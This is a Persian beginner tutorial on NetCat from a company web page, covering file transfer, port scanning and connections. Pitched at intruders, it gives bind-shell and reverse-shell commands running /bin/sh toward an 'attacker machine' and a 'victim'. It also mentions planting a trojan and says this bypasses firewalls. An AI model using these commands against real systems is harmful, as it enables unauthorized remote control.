پویا پردازش خراسان جنوبی

برنامه نویسی, فروش قطعات, شبکه

آموزش NetCat

برای بزرگنمایی روی تصویر کلیک کنید

سرویس گیرنده :
می تواندازطریق یک درگاه به کامپیوترموردنظر وصل شودو اطلاعاتی راازاین طریق ارسال کند.
سرویس دهنده :
هردرگاهی موردنظرشماباشدرابازکرده و منتظردریافت اطلاعات می شود.
NetCat برای انتقال اطلاعات :
یکی ازعامیانه ترین و ساده ترین امکاناتی که نت کت به شما می دهد انتقال فایلها می باشد.این برنامه قادر است یک فایل رابین دوکامپیوتربه راحتی منتقل کند.نت کت ازمفیدترین و سودمندترین ابزارها برای انتقال ، اطلاعات است . درصورتی که نت کت برروی یک کامپیوتربه صورت سرویس دهنده فعال باشد می توان ازطریق یک پورت ، اطلاعات را انتقال داد.
طرز انتقال اطلاعات :
                                                                              
                                                                                                      nc -l -p 1234 >file  
NC = اجرای برنامه
l- = حالت سرویس دهنده
p 1234- = شماره درگاه (پورت)
[File] = محل ذخیره داده هاارسالی

                                                                       [fileِفایل] >  nc [remot machine] 1234
NC - اجرای برنامه 
[remot machin] = نام کامپیوتر هدف (آی پی)
1234 = شماره پورت مورد نظر
[file] = اطلاعات با این اسم استخراج می شه

نکته درمورد < : « درصورتی که این علامت اسم یک فایل باشد به عنوان دستگاه خروجی مشخص می شود واطلاعات دریافت شده درون آن قرار می گیرند،درصورتی که اینکارصورت نگیرد اطلاعات برروی صفحه نمایش نشان داده می شود. »

NetCat و پویش ها (یافتن پورت های باز اعم از UDP & TCP ) :
یکی از بهترین و پرکاربرد ترین توانایی این برنامه قدرتمند جستجو کردن و یافتن درگاه های بازبرروی کامپیوتر مورد نظر می باشد.این برنامه به صورت سریع و به راحتی با IP مورد نظر ارتباط برقرار می کند.
نکته : « این برنامه ازتکنیک پویش پورت ها به صورت Vanilla که یک استاندارد می باشد،پشتیبانی می کند. »

                                                      echo QUIT nc -v -w 3 targetmachine startport endport
QUIT = این چهار کاراکتر به هر پورت بازارسال می شود
NC = اجرای برنامه نت کت
v- = خروجی Verbose برای نشان دادن درگاه های باز برروی صفحه نمایش 
w 3- = در3 ثانیه به هر جورت یک پیغام می فرستد و منتظرمی شه که این پیغام برگرده و معلوم بشه ان درگاه باز است یا بسته است
target machin = نام کامپیوتری(آی پی) که نت کت روی اون می خواهد اسکن بزنه
start port  , end port = در اینجا شما تعیین می کنید که ازچه درگاهی تا چه درگاهی اسکن بزنه
NetCat و اینجاد ارتباط با یک درگاه باز و ارسال داده :
بعد از یافتن یک درگاه باز برروی کامپیوترهدف می توان ازاین برنامه جهت انتقال اطلاعات ( فایل ) استفاده کرد.
ارتباط و انتقال تحت درگاه های TCP :

                                                                                    nc remotemachine portnumber 
NC = اجرای برنامه روی کامپیوتر مبدا
rempotemachine = نام کامپیوتر (آی پی)
portnumber = درگاه باز
ارتباط و انتقال تحت درگاه های UDP :

                                                                                nc -u remotemachine portnumber
NC = اجرای برنامه
u- = انتخاب پروتکل ارتباطی UDP
remotemachine = نام کامپیوتر(آی پی) هدف
portnumber = درگاه باز

NetCat و اجرای دستورات ازطریق خط فرمان :
یکی ازقابلیت های بسیار عالی که به درد نفوذگر می خوره این هست که می تونه یک فایل یا ... از راه دور اجرا کنه . (برای مثال شما یک تروجان مثل ساب سون رو برای کامپیوتر هدف می فرستید و بعد هم اجراش می کنید)
«کیف کردید نه ؟؟؟؟ » 
                                                                                          
                                                                                                nc -l -p [port] -e/bin/sh 
nc = اجرای برنامه نت کت
l- = حالت سرویس دهنده
p port- = شماره درگاه مورد نظربرای ارتباط
e/bin/sh- = آدرس برنامه ای که بعد از برقراری ارتباط باید اجرا بشه.

                                                                                       nc victimmachine portnumber
nc = اجرای برنامه
victimmachine = آدرس آی پی ماشین قربانی
portnumber = شماره پورت مورد نظر برای برقراری ارتباط ازطریق پروتکل TCP
دراین حالت نت کت برروی کامپیوتر قربانی درحالت انتظار باقی می ماندتانفوذگرشروع به ارسال کند.

NetCat و ایجاد نفوذ برروی کامپیوترموردنظردرحالت فعال :

                                                                            nc [attacker machine] [port] -e/bin/sh
nc = اجرای برنامه 
attacker machine = آدرس آی پی کامپیوتر نفوذگر
port = شماره درگاه مورد نظر
e/bin/sh- = نام فایلی که بعد از اینجاد ارتباط ، اجرا خواهد شد.

                                                                                                               nc -l -p port
nc = اجرای برنامه
l- = حالت سرویس دهنده
p port- = شماره پورت مورد نظر
با کمک این روش شما می توانید ازدیوار آتش به راحتی عبور کنید. به این دلیل که دیوار آتش سعی می کنه که ازورود اطلاعات از بیرون به داخل جلوگیری کنه ولی برعکس این موضوع رو به درستی پوشش نمی ده!    
تذکر: تمام علامت های [ ] که درمتن بالا به کا برده شده در فرمول وجود ندارد و فقط برای تفکیک بهتر نوشته هاست.
جوابیه : دوستان فرموده بودند که تاریخ آپ بعدی رو براشون اعلام کنم راستش این برای من امکان نداره ولی قول میدم هفته ای 2 - 3 تا آپ کنم . بازم پرسیده بودند که آیا این آموزش هایی که من میدم رو باید تو لینکس یا 2000 حتما انجام داد که جواب ایشون اینه که چون سطح این آموزش ها فعلا مبتدی می باشد نیازی به لینکس نیست و همون ویندوز رو استفاده کنید ولی به جای ایکس پی بهتره با 2000 کار کنید که راه بیوفتید . 

 

اطلاعات تماس
بیوگرافی شرکت

پویا پردازش خراسان جنوبی

بیرجند

نوع فعالیت

تولید کننده، خدمات

خدمات/محصولات

برنامه نویسی، فروش قطعات، شبکه، پشتیبانی

نوع مالکیت:

شرکت سهامی خاص

دسته‌بندی خدمات